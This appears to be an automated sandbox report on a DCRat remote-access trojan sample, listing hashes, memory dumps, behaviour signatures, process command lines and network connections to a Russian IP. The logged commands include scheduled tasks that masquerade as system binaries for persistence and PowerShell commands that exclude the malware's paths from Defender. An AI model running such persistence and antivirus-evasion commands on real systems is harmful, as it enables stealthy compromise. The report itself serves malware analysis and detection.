memory/5724-1-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-2-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-3-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-4-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-16-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/5724-17-0x0000000074BA2000-0x0000000074BA3000-memory.dmp
memory/5724-18-0x0000000074BA0000-0x0000000075151000-memory.dmp
C:\Users\Admin\AppData\Roaming\app.exe
| MD5 | c5de36531a3c4a3a1d9098ac862e5214 |
| SHA1 | 648231e5533d7ce188ff90a9c851fd2f22a73930 |
| SHA256 | 20083eeac2dc9fbeadca54a8a1f74c44336baacdd1d7ccb06836ec1946cd9857 |
| SHA512 | 2beb218cac41a38f912858d60398b1597c705942c7aa33f98aff4cdbc1788a5a915eeb543ce775f39d8e5847ba829bb48779431ff6a69b092df445e5492504e5 |
memory/5724-29-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-30-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-31-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-33-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-32-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4712-35-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4712-36-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-38-0x0000000074BA0000-0x0000000075151000-memory.dmp
C:\Users\Admin\AppData\Roaming\My.RawFile.exe
| MD5 | 5a733ef0de5e31e2e4b4abb016c0f251 |
| SHA1 | 28644040a6deac35c20fa931b5d003a97293363e |
| SHA256 | a80c77ca694eca3f6629c54572aba811e64b61975c5db2ff38c8d662d12b1ce7 |
| SHA512 | 9d09ac6b6a560643cac08345ab6ef8578011b11be7d4821d7aa1b3d76f2801d30cb4d206a4ff9335f0ece5cfa2ec8258754b2481102eac3da064e5005f7ffba9 |
memory/3660-52-0x0000000000400000-0x0000000000410000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\aspnet_compiler.exe.log
| MD5 | b3ac9d09e3a47d5fd00c37e075a70ecb |
| SHA1 | ad14e6d0e07b00bd10d77a06d68841b20675680b |
| SHA256 | 7a23c6e7ccd8811ecdf038d3a89d5c7d68ed37324bae2d4954125d9128fa9432 |
| SHA512 | 09b609ee1061205aa45b3c954efc6c1a03c8fd6b3011ff88cf2c060e19b1d7fd51ee0cb9d02a39310125f3a66aa0146261bdee3d804f472034df711bc942e316 |
memory/4860-57-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4860-60-0x0000000074BA0000-0x0000000075151000-memory.dmp
memory/4712-61-0x0000000074BA0000-0x0000000075151000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ja-JP\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\ja-JP\cc11b995f2a76d | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
| File created | C:\Windows\ja-JP\winlogon.exe | C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe
"C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf1" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\Temp\Crashpad\reports\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\Temp\Crashpad\reports\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\Temp\Crashpad\reports\audiodg.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\Crashpad\reports\audiodg.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bbdqqO4wF7.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe
"C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Windows\ja-JP\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\ja-JP\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Windows\ja-JP\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ja-JP\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\spoolsv.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\Skins\winlogon.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\Desktop\smss.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rhJyFUC1sI.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\49c80d33-fc82-49f6-9887-6194c9b9e4c9.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b0b9f79-e92d-461e-ba9d-035c6ade5369.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c00bb0f4-042f-4d3e-84f5-7199ba61a020.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39935f99-b55e-4815-a8a7-8541c3b8616e.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fd1e594-cedb-4e66-881e-35b3b8dceec7.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\663cd161-27d6-4f00-b318-bcbaaf2d742d.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bcdc0d54-74b5-4bf0-a765-2c7ef67e8c19.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\24460d33-9f14-4032-a003-e0efeb83429f.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\514d493e-a860-4192-984f-dc65d6893eb9.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56a8081e-fb2c-4086-ba28-50097651a504.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\48e748f3-a566-4a80-89e5-fd5c2e913cba.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\49c27f2b-b45b-40d4-9793-b432521ec358.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14bf4083-7c70-4ede-b737-48785590ba59.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\513c39f7-de23-4ef3-af25-e97130d2b705.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02916f4a-e6af-4d0e-b264-909a38163ccf.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43ebebfc-f677-4577-a210-efaeec9cf7f8.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b8593642-4ae0-4d7b-a635-55ead738bac7.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6dbfa688-7d89-49e9-9a8c-a72885053d3d.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\64bd468e-b006-4891-8c9e-ed6fe8762c66.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5a3c08a6-4162-4791-93b6-48e4dd3f605e.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4182c578-166e-4201-bf9d-5ec13bf3a395.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20a87400-8df2-4ca6-b6d5-d0dbe1d1144b.vbs"
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\spoolsv.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e533bebb-91a0-40e9-ba70-ab74737a4659.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7ece93cd-1e7b-4d05-91de-4312fb22e31b.vbs"
Network
| Country | Destination | Domain | Proto |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
| RU | 62.109.4.67:80 | 62.109.4.67 | tcp |
Files
memory/1924-0-0x000007FEF5DA3000-0x000007FEF5DA4000-memory.dmp
memory/1924-1-0x0000000000270000-0x0000000000412000-memory.dmp
memory/1924-2-0x000007FEF5DA0000-0x000007FEF678C000-memory.dmp
memory/1924-3-0x0000000000240000-0x000000000025C000-memory.dmp
memory/1924-4-0x0000000000260000-0x0000000000270000-memory.dmp
memory/1924-5-0x00000000005A0000-0x00000000005B6000-memory.dmp
memory/1924-7-0x00000000005F0000-0x0000000000600000-memory.dmp
memory/1924-6-0x00000000005C0000-0x00000000005C8000-memory.dmp
memory/1924-8-0x00000000005D0000-0x00000000005D8000-memory.dmp
memory/1924-9-0x00000000005E0000-0x00000000005EC000-memory.dmp
memory/1924-10-0x0000000000790000-0x000000000079C000-memory.dmp
memory/1924-11-0x00000000007A0000-0x00000000007AA000-memory.dmp
memory/1924-12-0x0000000002150000-0x000000000215E000-memory.dmp
memory/1924-13-0x0000000002160000-0x0000000002168000-memory.dmp
memory/1924-14-0x0000000002170000-0x0000000002178000-memory.dmp
memory/1924-15-0x0000000002180000-0x000000000218A000-memory.dmp
memory/1924-16-0x0000000002190000-0x000000000219C000-memory.dmp
C:\Recovery\20e7eb62-69f6-11ef-be0c-62cb582c238c\explorer.exe
| MD5 | 8b03d1f60bdf0b6465c0623109e7269e |
| SHA1 | 33fb1f09f53ca182e1112ed973fce8fa97e4398f |
| SHA256 | 1b06c73e9c03f55f8fe3c26f374a889e7095d080c3448d4d040db1ebf46f6aaf |
| SHA512 | 8c79bf16fdce864799bb6893565aa06f35737f91897537f08129bfe842ad46f39f4081dcc59760df59e416af3ec848fd2dec179d42900defad7d94b4678f2de0 |
C:\Program Files (x86)\Windows Portable Devices\csrss.exe
| MD5 | 0b73d95537d4effd03cef8ff0335ee4e |
| SHA1 | 97c6f7d160c7b0b22e4463a4c0ad9a519d003d8a |
